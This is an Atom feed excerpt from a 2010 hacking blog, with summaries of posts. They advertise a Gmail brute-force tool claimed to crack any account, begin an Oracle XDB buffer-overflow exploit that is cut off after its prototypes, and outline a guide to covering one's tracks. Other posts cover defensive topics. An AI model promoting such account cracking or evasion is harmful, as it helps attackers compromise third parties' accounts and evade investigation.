Brutemonkey is a Gmail Account bruteforcer/dictionary attack application. It will successfully crack any Gmail account. The bruteforce option may take longer than the dictionary method</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8932170243634028659/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/brutemonkey-gmail-bruteforcedictionary.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8932170243634028659'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8932170243634028659'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/brutemonkey-gmail-bruteforcedictionary.html' title='BruteMonkey Gmail Bruteforce/Dictionary Attack'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_rIh95t1bhWM/S92faAU26OI/AAAAAAAAAF8/oBVy1MoJby8/s72-c/Picture.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5359492729501510821</id><published>2010-05-02T13:24:00.001+08:00</published><updated>2011-06-20T01:22:51.740+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>securing Web with application firewall</title><summary type='text'>2006 wasc(web application security consurtium)releaseWeb Application Firewall Evaluation Criteria 
for detailed criteria of the desired web application firewall. Web application firewall implementation service(appliance, plugins, set of HTTP rules)created specifically to address the various types of attacks on web security,web application firewall specifically to cope with various kinds of </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5359492729501510821/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/securing-web-with-application-firewall.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5359492729501510821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5359492729501510821'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/securing-web-with-application-firewall.html' title='securing Web with application firewall'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5050667824380270987</id><published>2010-04-30T02:40:00.002+08:00</published><updated>2010-04-30T02:47:30.730+08:00</updated><title type='text'>ipv6-hackit/</title><summary type='text'> Subject      : kecoak-elektronik.net,ipsecs.comSubject      : Exploiting Future Internet - Defeating IPv6
Writer       : Ph03n1X (return?)
Contact      : staff@kecoak-elektronik.net
language ver : Indonesia
TOKET - Terbitan Online Kecoak Elektronik
Defending the classical hackers mind since 1995
IPv6 is the internet protocol of the future, which the IETF has been introducing
since 1998. Standard </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5050667824380270987/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/04/ipv6-hackit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5050667824380270987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5050667824380270987'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/04/ipv6-hackit.html' title='ipv6-hackit/'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5625114529259488335</id><published>2010-03-22T07:17:00.002+08:00</published><updated>2011-06-21T22:52:10.989+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Oracle XDB FTP service UNLOCK buffer overflow</title><summary type='text'>[+] vulnerabilities network level/stack based buffer overflow
[+] special network layer attack
[+] implemented over http/XML-db/ftp==&gt;windows XDB
[+] connecting:8080
[=] operation: win 32--&gt;xdb overflow
[+] author mc2_s3lector
[+] yogyacarderlink.web.id/KeDai Computerworks.com


exploit win32
#include 
#include 
#include 

int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5625114529259488335/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/03/oracle-xdb-ftp-service-unlock-buffer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5625114529259488335'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5625114529259488335'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/03/oracle-xdb-ftp-service-unlock-buffer.html' title='Oracle XDB FTP service UNLOCK buffer overflow'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4546715876491229973</id><published>2010-03-10T16:41:00.001+08:00</published><updated>2010-03-10T16:41:00.378+08:00</updated><title type='text'>Thanks for the malware sample!</title><summary type='text'>Here at the X-Force, we catch our fair share of malware from random  spammers and phishers just as any corporate or home user does. Today we  dive into one of these attacks to show how it works and what these guys  are after.
This poorly crafted email phishing attack was sent to us courtesy of:
Received: from  XXX.cpe.vivax.com.br ([189.55.XXX.XXX])
It contained a simple link to a website hosting</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4546715876491229973/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/03/thanks-for-malware-sample.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4546715876491229973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4546715876491229973'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/03/thanks-for-malware-sample.html' title='Thanks for the malware sample!'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_rIh95t1bhWM/S5dYSqyLdpI/AAAAAAAAAFI/KFaHp3kCk2c/s72-c/jscript_001.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3052036586308839555</id><published>2010-03-10T16:09:00.003+08:00</published><updated>2011-06-21T00:48:35.553+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Creating News for Blackhat SEO</title><summary type='text'>Spammers and scammers are no longer content with exploiting real news  events for their personal gain - they're now creating their own news to  earn money through affiliate programs using blackhat SEO techniques.Blackhat SEO is when spammers and scammers use various dirty tricks  to get links to their pages to show up near the top of search results on  search engines. 
It's been a problem for a </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3052036586308839555/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/03/creating-news-for-blackhat-seo.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3052036586308839555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3052036586308839555'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/03/creating-news-for-blackhat-seo.html' title='Creating News for Blackhat SEO'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_rIh95t1bhWM/S5dRmFL9gOI/AAAAAAAAAE4/5qFBc67GNkw/s72-c/cn_hosts_01.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7017286828920336677</id><published>2010-02-17T13:58:00.003+08:00</published><updated>2011-06-20T01:30:52.606+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>How to Prevent Joomla from being hacked or exploited</title><summary type='text'>Along these growing years in the development of Joomla,Joomla has came over to be the best and most reliable Content management System. But in recent news coverage we have seen that things can be exploited if you don't take the right precautions ,Joomla sites can be easily hacked by some little tweaks also.
So how to prevent yourself from being hacked??


While installing Joomla, make sure you </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7017286828920336677/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/02/how-to-prevent-joomla-from-being-hacked.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7017286828920336677'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7017286828920336677'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/02/how-to-prevent-joomla-from-being-hacked.html' title='How to Prevent Joomla from being hacked or exploited'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6269929156008801981</id><published>2010-02-12T12:13:00.002+08:00</published><updated>2010-02-12T12:15:34.111+08:00</updated><title type='text'>HOW TO COVER YOUR TRACKS</title><summary type='text'>PART ONE : THEORY &amp; BACKGROUND



                              I. INTRODUCTION
                             II. MENTAL
                            III. BASICS
                             IV. ADVANCED
                              V. UNDER SUSPECT
                             VI. CAUGHT
                            VII. PROGRAMS
                           VIII. LAST WORDS




     I. INTRODUCTION</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6269929156008801981/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/02/how-to-cover-your-tracks.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6269929156008801981'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6269929156008801981'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/02/how-to-cover-your-tracks.html' title='HOW TO COVER YOUR TRACKS'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry></feed>
